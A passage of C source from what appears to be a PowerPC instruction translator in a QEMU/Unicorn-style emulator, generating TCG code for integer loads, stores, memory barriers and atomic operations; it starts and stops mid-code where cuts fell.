lbz lbzu lbzux lbzx */ GEN_LDS(lbz, ld8u, 0x02, PPC_INTEGER); /* lha lhau lhaux lhax */ GEN_LDS(lha, ld16s, 0x0A, PPC_INTEGER); /* lhz lhzu lhzux lhzx */ GEN_LDS(lhz, ld16u, 0x08, PPC_INTEGER); /* lwz lwzu lwzux lwzx */ GEN_LDS(lwz, ld32u, 0x00, PPC_INTEGER); #define GEN_LDEPX(name, ldop, opc2, opc3) \ static void glue(gen_, name##epx)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ CHK_SV; \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ tcg_gen_qemu_ld_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], EA, PPC_TLB_EPID_LOAD, ldop);\ tcg_temp_free(tcg_ctx, EA); \ } GEN_LDEPX(lb, DEF_MEMOP(MO_UB), 0x1F, 0x02) GEN_LDEPX(lh, DEF_MEMOP(MO_UW), 0x1F, 0x08) GEN_LDEPX(lw, DEF_MEMOP(MO_UL), 0x1F, 0x00) #if defined(TARGET_PPC64) GEN_LDEPX(ld, DEF_MEMOP(MO_Q), 0x1D, 0x00) #endif #if defined(TARGET_PPC64) /* lwaux */ GEN_LDUX(lwa, ld32s, 0x15, 0x0B, PPC_64B); /* lwax */ GEN_LDX(lwa, ld32s, 0x15, 0x0A, PPC_64B); /* ldux */ GEN_LDUX(ld, ld64_i64, 0x15, 0x01, PPC_64B); /* ldx */ GEN_LDX(ld, ld64_i64, 0x15, 0x00, PPC_64B); /* CI load/store variants */ GEN_LDX_HVRM(ldcix, ld64_i64, 0x15, 0x1b, PPC_CILDST) GEN_LDX_HVRM(lwzcix, ld32u, 0x15, 0x15, PPC_CILDST) GEN_LDX_HVRM(lhzcix, ld16u, 0x15, 0x19, PPC_CILDST) GEN_LDX_HVRM(lbzcix, ld8u, 0x15, 0x1a, PPC_CILDST) static void gen_ld(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; if (Rc(ctx->opcode)) { if (unlikely(rA(ctx->opcode) == 0 || rA(ctx->opcode) == rD(ctx->opcode))) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); return; } } gen_set_access_type(ctx, ACCESS_INT); EA = tcg_temp_new(tcg_ctx); gen_addr_imm_index(ctx, EA, 0x03); if (ctx->opcode & 0x02) { /* lwa (lwau is undefined) */ gen_qemu_ld32s(ctx, cpu_gpr[rD(ctx->opcode)], EA); } else { /* ld - ldu */ gen_qemu_ld64_i64(ctx, cpu_gpr[rD(ctx->opcode)], EA); } if (Rc(ctx->opcode)) { tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], EA); } tcg_temp_free(tcg_ctx, EA); } /* lq */ static void gen_lq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int ra, rd; TCGv EA, hi, lo; /* lq is a legal user mode instruction starting in ISA 2.07 */ bool legal_in_user_mode = (ctx->insns_flags2 & 
PPC2_LSQ_ISA207) != 0; bool le_is_supported = (ctx->insns_flags2 & PPC2_LSQ_ISA207) != 0; if (!legal_in_user_mode && ctx->pr) { gen_priv_exception(ctx, POWERPC_EXCP_PRIV_OPC); return; } if (!le_is_supported && ctx->le_mode) { gen_align_no_le(ctx); return; } ra = rA(ctx->opcode); rd = rD(ctx->opcode); if (unlikely((rd & 1) || rd == ra)) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); return; } gen_set_access_type(ctx, ACCESS_INT); EA = tcg_temp_new(tcg_ctx); gen_addr_imm_index(ctx, EA, 0x0F); /* Note that the low part is always in RD+1, even in LE mode. */ lo = cpu_gpr[rd + 1]; hi = cpu_gpr[rd]; if (tb_cflags(ctx->base.tb) & CF_PARALLEL) { if (HAVE_ATOMIC128) { TCGv_i32 oi = tcg_temp_new_i32(tcg_ctx); if (ctx->le_mode) { tcg_gen_movi_i32(tcg_ctx, oi, make_memop_idx(MO_LEQ, ctx->mem_idx)); gen_helper_lq_le_parallel(tcg_ctx, lo, tcg_ctx->cpu_env, EA, oi); } else { tcg_gen_movi_i32(tcg_ctx, oi, make_memop_idx(MO_BEQ, ctx->mem_idx)); gen_helper_lq_be_parallel(tcg_ctx, lo, tcg_ctx->cpu_env, EA, oi); } tcg_temp_free_i32(tcg_ctx, oi); tcg_gen_ld_i64(tcg_ctx, hi, tcg_ctx->cpu_env, offsetof(CPUPPCState, retxh)); } else { /* Restart with exclusive lock. */ gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); ctx->base.is_jmp = DISAS_NORETURN; } } else if (ctx->le_mode) { tcg_gen_qemu_ld_i64(tcg_ctx, lo, EA, ctx->mem_idx, MO_LEQ); gen_addr_add(ctx, EA, EA, 8); tcg_gen_qemu_ld_i64(tcg_ctx, hi, EA, ctx->mem_idx, MO_LEQ); } else { tcg_gen_qemu_ld_i64(tcg_ctx, hi, EA, ctx->mem_idx, MO_BEQ); gen_addr_add(ctx, EA, EA, 8); tcg_gen_qemu_ld_i64(tcg_ctx, lo, EA, ctx->mem_idx, MO_BEQ); } tcg_temp_free(tcg_ctx, EA); } #endif /*** Integer store ***/ #define GEN_ST(name, stop, opc, type) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_imm_index(ctx, EA, 0); \ gen_qemu_##stop(ctx, cpu_gpr[rS(ctx->opcode)], EA); \ tcg_temp_free(tcg_ctx, EA); \ } #define GEN_STU(name, stop, opc, type) \ static void glue(gen_, stop##u)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ if (unlikely(rA(ctx->opcode) == 0)) { \ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); \ return; \ } \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ if (type == PPC_64B) \ gen_addr_imm_index(ctx, EA, 0x03); \ else \ gen_addr_imm_index(ctx, EA, 0); \ gen_qemu_##stop(ctx, cpu_gpr[rS(ctx->opcode)], EA); \ tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], EA); \ tcg_temp_free(tcg_ctx, EA); \ } #define GEN_STUX(name, stop, opc2, opc3, type) \ static void glue(gen_, name##ux)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ if (unlikely(rA(ctx->opcode) == 0)) { \ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); \ return; \ } \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ gen_qemu_##stop(ctx, cpu_gpr[rS(ctx->opcode)], EA); \ tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], EA); \ tcg_temp_free(tcg_ctx, EA); \ } #define GEN_STX_E(name, stop, opc2, opc3, type, type2, chk) \ static void glue(gen_, name##x)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ chk; \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ gen_qemu_##stop(ctx, cpu_gpr[rS(ctx->opcode)], EA); \ tcg_temp_free(tcg_ctx, EA); \ } #define GEN_STX(name, stop, opc2, opc3, type) \ GEN_STX_E(name, stop, opc2, opc3, type, PPC_NONE, CHK_NONE) 
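/*
 * Illustrative expansion (a sketch, not additional emitted code): with
 * the macros above, GEN_STX(stwbr, st32r, 0x16, 0x14, PPC_INTEGER)
 * further below produces a handler equivalent to
 *
 *     static void gen_stwbrx(DisasContext *ctx)
 *     {
 *         TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
 *         TCGv EA;
 *         gen_set_access_type(ctx, ACCESS_INT);
 *         EA = tcg_temp_new(tcg_ctx);
 *         gen_addr_reg_index(ctx, EA);
 *         gen_qemu_st32r(ctx, cpu_gpr[rS(ctx->opcode)], EA);
 *         tcg_temp_free(tcg_ctx, EA);
 *     }
 *
 * i.e. one small, fully specialised handler per (name, memop) pair,
 * with no runtime dispatch on the access kind.
 */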
#define GEN_STX_HVRM(name, stop, opc2, opc3, type) \ GEN_STX_E(name, stop, opc2, opc3, type, PPC_NONE, CHK_HVRM) #define GEN_STS(name, stop, op, type) \ GEN_ST(name, stop, op | 0x20, type); \ GEN_STU(name, stop, op | 0x21, type); \ GEN_STUX(name, stop, 0x17, op | 0x01, type); \ GEN_STX(name, stop, 0x17, op | 0x00, type) /* stb stbu stbux stbx */ GEN_STS(stb, st8, 0x06, PPC_INTEGER); /* sth sthu sthux sthx */ GEN_STS(sth, st16, 0x0C, PPC_INTEGER); /* stw stwu stwux stwx */ GEN_STS(stw, st32, 0x04, PPC_INTEGER); #define GEN_STEPX(name, stop, opc2, opc3) \ static void glue(gen_, name##epx)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ CHK_SV; \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ tcg_gen_qemu_st_tl(tcg_ctx, \ cpu_gpr[rD(ctx->opcode)], EA, PPC_TLB_EPID_STORE, stop); \ tcg_temp_free(tcg_ctx, EA); \ } GEN_STEPX(stb, DEF_MEMOP(MO_UB), 0x1F, 0x06) GEN_STEPX(sth, DEF_MEMOP(MO_UW), 0x1F, 0x0C) GEN_STEPX(stw, DEF_MEMOP(MO_UL), 0x1F, 0x04) #if defined(TARGET_PPC64) GEN_STEPX(std, DEF_MEMOP(MO_Q), 0x1d, 0x04) #endif #if defined(TARGET_PPC64) GEN_STUX(std, st64_i64, 0x15, 0x05, PPC_64B); GEN_STX(std, st64_i64, 0x15, 0x04, PPC_64B); GEN_STX_HVRM(stdcix, st64_i64, 0x15, 0x1f, PPC_CILDST) GEN_STX_HVRM(stwcix, st32, 0x15, 0x1c, PPC_CILDST) GEN_STX_HVRM(sthcix, st16, 0x15, 0x1d, PPC_CILDST) GEN_STX_HVRM(stbcix, st8, 0x15, 0x1e, PPC_CILDST) static void gen_std(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rs; TCGv EA; rs = rS(ctx->opcode); if ((ctx->opcode & 0x3) == 0x2) { /* stq */ bool legal_in_user_mode = (ctx->insns_flags2 & PPC2_LSQ_ISA207) != 0; bool le_is_supported = (ctx->insns_flags2 & PPC2_LSQ_ISA207) != 0; TCGv hi, lo; if (!(ctx->insns_flags & PPC_64BX)) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); } if (!legal_in_user_mode && ctx->pr) { gen_priv_exception(ctx, POWERPC_EXCP_PRIV_OPC); return; } if (!le_is_supported && ctx->le_mode) { gen_align_no_le(ctx); return; } if (unlikely(rs & 1)) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); return; } gen_set_access_type(ctx, ACCESS_INT); EA = tcg_temp_new(tcg_ctx); gen_addr_imm_index(ctx, EA, 0x03); /* Note that the low part is always in RS+1, even in LE mode. */ lo = cpu_gpr[rs + 1]; hi = cpu_gpr[rs]; if (tb_cflags(ctx->base.tb) & CF_PARALLEL) { if (HAVE_ATOMIC128) { TCGv_i32 oi = tcg_temp_new_i32(tcg_ctx); if (ctx->le_mode) { tcg_gen_movi_i32(tcg_ctx, oi, make_memop_idx(MO_LEQ, ctx->mem_idx)); gen_helper_stq_le_parallel(tcg_ctx, tcg_ctx->cpu_env, EA, lo, hi, oi); } else { tcg_gen_movi_i32(tcg_ctx, oi, make_memop_idx(MO_BEQ, ctx->mem_idx)); gen_helper_stq_be_parallel(tcg_ctx, tcg_ctx->cpu_env, EA, lo, hi, oi); } tcg_temp_free_i32(tcg_ctx, oi); } else { /* Restart with exclusive lock. 
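             * gen_helper_exit_atomic raises EXCP_ATOMIC, after which the
             * engine re-executes just this instruction with all other
             * vCPUs stopped, so the plain (non-parallel) path below
             * applies on the retry.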
             */
            gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env);
            ctx->base.is_jmp = DISAS_NORETURN;
        }
    } else if (ctx->le_mode) {
        tcg_gen_qemu_st_i64(tcg_ctx, lo, EA, ctx->mem_idx, MO_LEQ);
        gen_addr_add(ctx, EA, EA, 8);
        tcg_gen_qemu_st_i64(tcg_ctx, hi, EA, ctx->mem_idx, MO_LEQ);
    } else {
        tcg_gen_qemu_st_i64(tcg_ctx, hi, EA, ctx->mem_idx, MO_BEQ);
        gen_addr_add(ctx, EA, EA, 8);
        tcg_gen_qemu_st_i64(tcg_ctx, lo, EA, ctx->mem_idx, MO_BEQ);
    }
    tcg_temp_free(tcg_ctx, EA);
    } else {
        /* std / stdu */
        if (Rc(ctx->opcode)) {
            if (unlikely(rA(ctx->opcode) == 0)) {
                gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL);
                return;
            }
        }
        gen_set_access_type(ctx, ACCESS_INT);
        EA = tcg_temp_new(tcg_ctx);
        gen_addr_imm_index(ctx, EA, 0x03);
        gen_qemu_st64_i64(ctx, cpu_gpr[rs], EA);
        if (Rc(ctx->opcode)) {
            tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], EA);
        }
        tcg_temp_free(tcg_ctx, EA);
    }
}
#endif

/*** Integer load and store with byte reverse ***/

/* lhbrx */
GEN_LDX(lhbr, ld16ur, 0x16, 0x18, PPC_INTEGER);
/* lwbrx */
GEN_LDX(lwbr, ld32ur, 0x16, 0x10, PPC_INTEGER);

#if defined(TARGET_PPC64)
/* ldbrx */
GEN_LDX_E(ldbr, ld64ur_i64, 0x14, 0x10, PPC_NONE, PPC2_DBRX, CHK_NONE);
/* stdbrx */
GEN_STX_E(stdbr, st64r_i64, 0x14, 0x14, PPC_NONE, PPC2_DBRX, CHK_NONE);
#endif  /* TARGET_PPC64 */

/* sthbrx */
GEN_STX(sthbr, st16r, 0x16, 0x1C, PPC_INTEGER);
/* stwbrx */
GEN_STX(stwbr, st32r, 0x16, 0x14, PPC_INTEGER);

/*** Integer load and store multiple ***/

/* lmw */
static void gen_lmw(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv t0;
    TCGv_i32 t1;

    if (ctx->le_mode) {
        gen_align_no_le(ctx);
        return;
    }
    gen_set_access_type(ctx, ACCESS_INT);
    t0 = tcg_temp_new(tcg_ctx);
    t1 = tcg_const_i32(tcg_ctx, rD(ctx->opcode));
    gen_addr_imm_index(ctx, t0, 0);
    gen_helper_lmw(tcg_ctx, tcg_ctx->cpu_env, t0, t1);
    tcg_temp_free(tcg_ctx, t0);
    tcg_temp_free_i32(tcg_ctx, t1);
}

/* stmw */
static void gen_stmw(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv t0;
    TCGv_i32 t1;

    if (ctx->le_mode) {
        gen_align_no_le(ctx);
        return;
    }
    gen_set_access_type(ctx, ACCESS_INT);
    t0 = tcg_temp_new(tcg_ctx);
    t1 = tcg_const_i32(tcg_ctx, rS(ctx->opcode));
    gen_addr_imm_index(ctx, t0, 0);
    gen_helper_stmw(tcg_ctx, tcg_ctx->cpu_env, t0, t1);
    tcg_temp_free(tcg_ctx, t0);
    tcg_temp_free_i32(tcg_ctx, t1);
}

/*** Integer load and store strings ***/

/* lswi */
/*
 * PowerPC32 specification says we must generate an exception if rA is
 * in the range of registers to be loaded. On the other hand, IBM says
 * this is valid, but rA won't be loaded. For now, I'll follow the
 * spec...
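 * E.g. lswi with rD=r4, rA=r5 and NB=12 would load r4, r5 and r6,
 * so rA falls in the loaded range and the lsw_reg_in_range() check
 * below rejects it.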
 */
static void gen_lswi(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv t0;
    TCGv_i32 t1, t2;
    int nb = NB(ctx->opcode);
    int start = rD(ctx->opcode);
    int ra = rA(ctx->opcode);
    int nr;

    if (ctx->le_mode) {
        gen_align_no_le(ctx);
        return;
    }
    if (nb == 0) {
        nb = 32;
    }
    nr = DIV_ROUND_UP(nb, 4);
    if (unlikely(lsw_reg_in_range(start, nr, ra))) {
        gen_inval_exception(ctx, POWERPC_EXCP_INVAL_LSWX);
        return;
    }
    gen_set_access_type(ctx, ACCESS_INT);
    t0 = tcg_temp_new(tcg_ctx);
    gen_addr_register(ctx, t0);
    t1 = tcg_const_i32(tcg_ctx, nb);
    t2 = tcg_const_i32(tcg_ctx, start);
    gen_helper_lsw(tcg_ctx, tcg_ctx->cpu_env, t0, t1, t2);
    tcg_temp_free(tcg_ctx, t0);
    tcg_temp_free_i32(tcg_ctx, t1);
    tcg_temp_free_i32(tcg_ctx, t2);
}

/* lswx */
static void gen_lswx(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv t0;
    TCGv_i32 t1, t2, t3;

    if (ctx->le_mode) {
        gen_align_no_le(ctx);
        return;
    }
    gen_set_access_type(ctx, ACCESS_INT);
    t0 = tcg_temp_new(tcg_ctx);
    gen_addr_reg_index(ctx, t0);
    t1 = tcg_const_i32(tcg_ctx, rD(ctx->opcode));
    t2 = tcg_const_i32(tcg_ctx, rA(ctx->opcode));
    t3 = tcg_const_i32(tcg_ctx, rB(ctx->opcode));
    gen_helper_lswx(tcg_ctx, tcg_ctx->cpu_env, t0, t1, t2, t3);
    tcg_temp_free(tcg_ctx, t0);
    tcg_temp_free_i32(tcg_ctx, t1);
    tcg_temp_free_i32(tcg_ctx, t2);
    tcg_temp_free_i32(tcg_ctx, t3);
}

/* stswi */
static void gen_stswi(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv t0;
    TCGv_i32 t1, t2;
    int nb = NB(ctx->opcode);

    if (ctx->le_mode) {
        gen_align_no_le(ctx);
        return;
    }
    gen_set_access_type(ctx, ACCESS_INT);
    t0 = tcg_temp_new(tcg_ctx);
    gen_addr_register(ctx, t0);
    if (nb == 0) {
        nb = 32;
    }
    t1 = tcg_const_i32(tcg_ctx, nb);
    t2 = tcg_const_i32(tcg_ctx, rS(ctx->opcode));
    gen_helper_stsw(tcg_ctx, tcg_ctx->cpu_env, t0, t1, t2);
    tcg_temp_free(tcg_ctx, t0);
    tcg_temp_free_i32(tcg_ctx, t1);
    tcg_temp_free_i32(tcg_ctx, t2);
}

/* stswx */
static void gen_stswx(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv t0;
    TCGv_i32 t1, t2;

    if (ctx->le_mode) {
        gen_align_no_le(ctx);
        return;
    }
    gen_set_access_type(ctx, ACCESS_INT);
    t0 = tcg_temp_new(tcg_ctx);
    gen_addr_reg_index(ctx, t0);
    t1 = tcg_temp_new_i32(tcg_ctx);
    tcg_gen_trunc_tl_i32(tcg_ctx, t1, cpu_xer);
    tcg_gen_andi_i32(tcg_ctx, t1, t1, 0x7F);
    t2 = tcg_const_i32(tcg_ctx, rS(ctx->opcode));
    gen_helper_stsw(tcg_ctx, tcg_ctx->cpu_env, t0, t1, t2);
    tcg_temp_free(tcg_ctx, t0);
    tcg_temp_free_i32(tcg_ctx, t1);
    tcg_temp_free_i32(tcg_ctx, t2);
}

/*** Memory synchronisation ***/

/* eieio */
static void gen_eieio(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGBar bar = TCG_MO_LD_ST;

    /*
     * POWER9 has an eieio instruction variant using bit 6 as a hint to
     * tell the CPU it is a store-forwarding barrier.
     */
    if (ctx->opcode & 0x2000000) {
        /*
         * ISA says that "Reserved fields in instructions are ignored
         * by the processor". So we ignore bit 6 on non-POWER9 CPUs, but
         * as this is not an instruction software should be using,
         * complain to the user.
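         * (0x2000000 is 1 << 25, i.e. bit 6 of the 32-bit instruction
         * word in the ISA's big-endian bit numbering.)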
*/ if (!(ctx->insns_flags2 & PPC2_ISA300)) { qemu_log_mask(LOG_GUEST_ERROR, "invalid eieio using bit 6 at @" TARGET_FMT_lx "\n", ctx->base.pc_next - 4); } else { bar = TCG_MO_ST_LD; } } tcg_gen_mb(tcg_ctx, bar | TCG_BAR_SC); } static inline void gen_check_tlb_flush(DisasContext *ctx, bool global) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t; TCGLabel *l; if (!ctx->lazy_tlb_flush) { return; } l = gen_new_label(tcg_ctx); t = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, t, tcg_ctx->cpu_env, offsetof(CPUPPCState, tlb_need_flush)); tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, t, 0, l); if (global) { gen_helper_check_tlb_flush_global(tcg_ctx, tcg_ctx->cpu_env); } else { gen_helper_check_tlb_flush_local(tcg_ctx, tcg_ctx->cpu_env); } gen_set_label(tcg_ctx, l); tcg_temp_free_i32(tcg_ctx, t); } /* isync */ static void gen_isync(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* * We need to check for a pending TLB flush. This can only happen in * kernel mode however so check MSR_PR */ if (!ctx->pr) { gen_check_tlb_flush(ctx, false); } tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_SC); gen_stop_exception(ctx); } #define MEMOP_GET_SIZE(x) (1ULL << ((x) & MO_SIZE)) static void gen_load_locked(DisasContext *ctx, MemOp memop) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv gpr = cpu_gpr[rD(ctx->opcode)]; TCGv t0 = tcg_temp_new(tcg_ctx); gen_set_access_type(ctx, ACCESS_RES); gen_addr_reg_index(ctx, t0); tcg_gen_qemu_ld_tl(tcg_ctx, gpr, t0, ctx->mem_idx, memop | MO_ALIGN); tcg_gen_mov_tl(tcg_ctx, cpu_reserve, t0); tcg_gen_mov_tl(tcg_ctx, cpu_reserve_val, gpr); tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_LDAQ); tcg_temp_free(tcg_ctx, t0); } #define LARX(name, memop) \ static void gen_##name(DisasContext *ctx) \ { \ gen_load_locked(ctx, memop); \ } /* lwarx */ LARX(lbarx, DEF_MEMOP(MO_UB)) LARX(lharx, DEF_MEMOP(MO_UW)) LARX(lwarx, DEF_MEMOP(MO_UL)) static void gen_fetch_inc_conditional(DisasContext *ctx, MemOp memop, TCGv EA, TCGCond cond, int addend) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); TCGv u = tcg_temp_new(tcg_ctx); tcg_gen_qemu_ld_tl(tcg_ctx, t, EA, ctx->mem_idx, memop); tcg_gen_addi_tl(tcg_ctx, t2, EA, MEMOP_GET_SIZE(memop)); tcg_gen_qemu_ld_tl(tcg_ctx, t2, t2, ctx->mem_idx, memop); tcg_gen_addi_tl(tcg_ctx, u, t, addend); /* E.g. for fetch and increment bounded... */ /* mem(EA,s) = (t != t2 ? u = t + 1 : t) */ tcg_gen_movcond_tl(tcg_ctx, cond, u, t, t2, u, t); tcg_gen_qemu_st_tl(tcg_ctx, u, EA, ctx->mem_idx, memop); /* RT = (t != t2 ? 
t : u = 1<<(s*8-1)) */ tcg_gen_movi_tl(tcg_ctx, u, 1ULL << (MEMOP_GET_SIZE(memop) * 8 - 1)); tcg_gen_movcond_tl(tcg_ctx, cond, cpu_gpr[rD(ctx->opcode)], t, t2, t, u); tcg_temp_free(tcg_ctx, t); tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, u); } static void gen_ld_atomic(DisasContext *ctx, MemOp memop) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t gpr_FC = FC(ctx->opcode); TCGv EA = tcg_temp_new(tcg_ctx); int rt = rD(ctx->opcode); bool need_serial; TCGv src, dst; gen_addr_register(ctx, EA); dst = cpu_gpr[rt]; src = cpu_gpr[(rt + 1) & 31]; need_serial = false; memop |= MO_ALIGN; switch (gpr_FC) { case 0: /* Fetch and add */ tcg_gen_atomic_fetch_add_tl(tcg_ctx, dst, EA, src, ctx->mem_idx, memop); break; case 1: /* Fetch and xor */ tcg_gen_atomic_fetch_xor_tl(tcg_ctx, dst, EA, src, ctx->mem_idx, memop); break; case 2: /* Fetch and or */ tcg_gen_atomic_fetch_or_tl(tcg_ctx, dst, EA, src, ctx->mem_idx, memop); break; case 3: /* Fetch and 'and' */ tcg_gen_atomic_fetch_and_tl(tcg_ctx, dst, EA, src, ctx->mem_idx, memop); break; case 4: /* Fetch and max unsigned */ tcg_gen_atomic_fetch_umax_tl(tcg_ctx, dst, EA, src, ctx->mem_idx, memop); break; case 5: /* Fetch and max signed */ tcg_gen_atomic_fetch_smax_tl(tcg_ctx, dst, EA, src, ctx->mem_idx, memop); break; case 6: /* Fetch and min unsigned */ tcg_gen_atomic_fetch_umin_tl(tcg_ctx, dst, EA, src, ctx->mem_idx, memop); break; case 7: /* Fetch and min signed */ tcg_gen_atomic_fetch_smin_tl(tcg_ctx, dst, EA, src, ctx->mem_idx, memop); break; case 8: /* Swap */ tcg_gen_atomic_xchg_tl(tcg_ctx, dst, EA, src, ctx->mem_idx, memop); break; case 16: /* Compare and swap not equal */ if (tb_cflags(ctx->base.tb) & CF_PARALLEL) { need_serial = true; } else { TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_qemu_ld_tl(tcg_ctx, t0, EA, ctx->mem_idx, memop); if ((memop & MO_SIZE) == MO_64 || TARGET_LONG_BITS == 32) { tcg_gen_mov_tl(tcg_ctx, t1, src); } else { tcg_gen_ext32u_tl(tcg_ctx, t1, src); } tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t0, t1, cpu_gpr[(rt + 2) & 31], t0); tcg_gen_qemu_st_tl(tcg_ctx, t1, EA, ctx->mem_idx, memop); tcg_gen_mov_tl(tcg_ctx, dst, t0); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } break; case 24: /* Fetch and increment bounded */ if (tb_cflags(ctx->base.tb) & CF_PARALLEL) { need_serial = true; } else { gen_fetch_inc_conditional(ctx, memop, EA, TCG_COND_NE, 1); } break; case 25: /* Fetch and increment equal */ if (tb_cflags(ctx->base.tb) & CF_PARALLEL) { need_serial = true; } else { gen_fetch_inc_conditional(ctx, memop, EA, TCG_COND_EQ, 1); } break; case 28: /* Fetch and decrement bounded */ if (tb_cflags(ctx->base.tb) & CF_PARALLEL) { need_serial = true; } else { gen_fetch_inc_conditional(ctx, memop, EA, TCG_COND_NE, -1); } break; default: /* invoke data storage error handler */ gen_exception_err(ctx, POWERPC_EXCP_DSI, POWERPC_EXCP_INVAL); } tcg_temp_free(tcg_ctx, EA); if (need_serial) { /* Restart with exclusive lock. 
*/ gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); ctx->base.is_jmp = DISAS_NORETURN; } } static void gen_lwat(DisasContext *ctx) { gen_ld_atomic(ctx, DEF_MEMOP(MO_UL)); } #ifdef TARGET_PPC64 static void gen_ldat(DisasContext *ctx) { gen_ld_atomic(ctx, DEF_MEMOP(MO_Q)); } #endif static void gen_st_atomic(DisasContext *ctx, MemOp memop) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t gpr_FC = FC(ctx->opcode); TCGv EA = tcg_temp_new(tcg_ctx); TCGv src, discard; gen_addr_register(ctx, EA); src = cpu_gpr[rD(ctx->opcode)]; discard = tcg_temp_new(tcg_ctx); memop |= MO_ALIGN; switch (gpr_FC) { case 0: /* add and Store */ tcg_gen_atomic_add_fetch_tl(tcg_ctx, discard, EA, src, ctx->mem_idx, memop); break; case 1: /* xor and Store */ tcg_gen_atomic_xor_fetch_tl(tcg_ctx, discard, EA, src, ctx->mem_idx, memop); break; case 2: /* Or and Store */ tcg_gen_atomic_or_fetch_tl(tcg_ctx, discard, EA, src, ctx->mem_idx, memop); break; case 3: /* 'and' and Store */ tcg_gen_atomic_and_fetch_tl(tcg_ctx, discard, EA, src, ctx->mem_idx, memop); break; case 4: /* Store max unsigned */ tcg_gen_atomic_umax_fetch_tl(tcg_ctx, discard, EA, src, ctx->mem_idx, memop); break; case 5: /* Store max signed */ tcg_gen_atomic_smax_fetch_tl(tcg_ctx, discard, EA, src, ctx->mem_idx, memop); break; case 6: /* Store min unsigned */ tcg_gen_atomic_umin_fetch_tl(tcg_ctx, discard, EA, src, ctx->mem_idx, memop); break; case 7: /* Store min signed */ tcg_gen_atomic_smin_fetch_tl(tcg_ctx, discard, EA, src, ctx->mem_idx, memop); break; case 24: /* Store twin */ if (tb_cflags(ctx->base.tb) & CF_PARALLEL) { /* Restart with exclusive lock. */ gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); ctx->base.is_jmp = DISAS_NORETURN; } else { TCGv t = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); TCGv s = tcg_temp_new(tcg_ctx); TCGv s2 = tcg_temp_new(tcg_ctx); TCGv ea_plus_s = tcg_temp_new(tcg_ctx); tcg_gen_qemu_ld_tl(tcg_ctx, t, EA, ctx->mem_idx, memop); tcg_gen_addi_tl(tcg_ctx, ea_plus_s, EA, MEMOP_GET_SIZE(memop)); tcg_gen_qemu_ld_tl(tcg_ctx, t2, ea_plus_s, ctx->mem_idx, memop); 